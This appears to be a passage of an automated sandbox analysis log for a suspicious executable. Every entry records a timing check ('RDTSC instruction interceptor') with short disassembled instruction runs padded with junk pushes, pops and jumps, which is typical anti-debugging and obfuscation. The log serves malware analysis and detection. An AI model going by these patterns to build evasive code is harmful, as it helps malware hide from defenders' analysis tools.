                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5862EF second address: 5862F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5862F5 second address: 586314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007F4C288D0386h 0x0000000e jmp 00007F4C288D0390h 0x00000013 popad 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 589920 second address: 58995D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F4C28D8B356h 0x0000000a pop eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007F4C28D8B360h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 ja 00007F4C28D8B356h 0x0000001d pushad 0x0000001e popad 0x0000001f push edx 0x00000020 pop edx 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4C28D8B35Ch 0x00000029 push edi 0x0000002a pop edi 0x0000002b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58B0BA second address: 58B0C9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F4C288D0394h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58B0C9 second address: 58B0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58E4CB second address: 58E4DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D038Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58E4DD second address: 58E4E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58E609 second address: 58E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edi 0x00000007 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58E610 second address: 58E616 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58E616 second address: 58E61A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58E89C second address: 58E8B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 ja 00007F4C28D8B356h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58EB29 second address: 58EB2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58EB2F second address: 58EB33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58EB33 second address: 58EB37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58EB37 second address: 58EB3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 58EB3D second address: 58EB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5939D1 second address: 5939DB instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5939DB second address: 5939FB instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4C288D0388h 0x00000008 jmp 00007F4C288D038Ah 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5939FB second address: 593A04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59BB04 second address: 59BB12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F4C288D0386h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59BB12 second address: 59BB18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 599C3C second address: 599C5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C288D0397h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 599C5B second address: 599C5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A1C4 second address: 59A1D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A1D0 second address: 59A1D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A341 second address: 59A35B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F4C288D038Ah 0x00000010 pushad 0x00000011 popad 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A35B second address: 59A35F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A35F second address: 59A38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4C288D0397h 0x0000000f jmp 00007F4C288D038Ah 0x00000014 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A659 second address: 59A65F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A65F second address: 59A66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A66B second address: 59A66F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 59A7E2 second address: 59A80B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4C288D0386h 0x0000000a jmp 00007F4C288D0398h 0x0000000f jng 00007F4C288D0386h 0x00000015 popad 0x00000016 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5A2D49 second address: 5A2D5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4C28D8B361h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5A3042 second address: 5A304C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5A304C second address: 5A306D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4C28D8B368h 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5A306D second address: 5A3084 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4C288D0386h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F4C288D0388h 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5AE9E6 second address: 5AEA26 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4C28D8B356h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F4C28D8B365h 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F4C28D8B35Eh 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F4C28D8B35Bh 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5AEA26 second address: 5AEA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5AEA2B second address: 5AEA47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Ah 0x00000009 jmp 00007F4C28D8B35Eh 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5AEA47 second address: 5AEA4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B2C05 second address: 5B2C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B363h 0x00000009 jmp 00007F4C28D8B365h 0x0000000e popad 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B2C32 second address: 5B2C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B637E second address: 5B63A1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4C28D8B367h 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B63A1 second address: 5B63B3 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C288D0386h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B63B3 second address: 5B63D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B366h 0x00000009 pop esi 0x0000000a push ecx 0x0000000b jbe 00007F4C28D8B356h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B63D7 second address: 5B63DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5B63DC second address: 5B63F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4C28D8B356h 0x0000000a jmp 00007F4C28D8B362h 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C510C second address: 5C5114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C5114 second address: 5C511E instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4C28D8B362h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C511E second address: 5C5124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C5124 second address: 5C5130 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C5130 second address: 5C5142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F4C288D038Ah 0x0000000d rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C5142 second address: 5C5148 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C4FA0 second address: 5C4FAA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4C288D0386h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5C4FAA second address: 5C4FB5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnl 00007F4C28D8B356h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CCAB3 second address: 5CCAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CCAB9 second address: 5CCAC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F4C28D8B358h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CCAC7 second address: 5CCAD7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C288D0392h 0x00000008 jne 00007F4C288D0386h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CCAD7 second address: 5CCAE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F4C28D8B35Eh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB574 second address: 5CB5A1 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4C288D0386h 0x00000008 jbe 00007F4C288D0386h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F4C288D0391h 0x00000016 pushad 0x00000017 popad 0x00000018 jo 00007F4C288D0386h 0x0000001e push esi 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB6F3 second address: 5CB6F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB6F7 second address: 5CB6FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB6FB second address: 5CB725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnc 00007F4C28D8B356h 0x0000000f jmp 00007F4C28D8B35Fh 0x00000014 popad 0x00000015 pop ecx 0x00000016 jnp 00007F4C28D8B36Ah 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB725 second address: 5CB72B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CB72B second address: 5CB72F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBAE1 second address: 5CBAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBAE7 second address: 5CBB35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C28D8B364h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c jmp 00007F4C28D8B360h 0x00000011 pushad 0x00000012 jmp 00007F4C28D8B360h 0x00000017 jmp 00007F4C28D8B360h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBB35 second address: 5CBB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 jg 00007F4C288D03B1h 0x0000000c jns 00007F4C288D0388h 0x00000012 push eax 0x00000013 push edx 0x00000014 jne 00007F4C288D0386h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5CBE2C second address: 5CBE3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C28D8B35Eh 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5D3F07 second address: 5D3F1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4C288D0393h 0x00000009 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5D7AE1 second address: 5D7AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 ja 00007F4C288D0386h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E3ECB second address: 5E3ED7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F4C28D8B356h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E2896 second address: 5E289A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E289A second address: 5E28A0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E28A0 second address: 5E28A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5E28A6 second address: 5E28AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F1937 second address: 5F193D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F193D second address: 5F1941 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F1941 second address: 5F1964 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4C288D0399h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 5F1964 second address: 5F19B0 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4C28D8B356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f jp 00007F4C28D8B360h 0x00000015 jc 00007F4C28D8B368h 0x0000001b jmp 00007F4C28D8B362h 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F4C28D8B361h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60C039 second address: 60C03F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60AFCA second address: 60AFD6 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F4C28D8B356h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60AFD6 second address: 60AFE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4C288D038Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRDTSC instruction interceptor: First address: 60B3B3 second address: 60B3B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
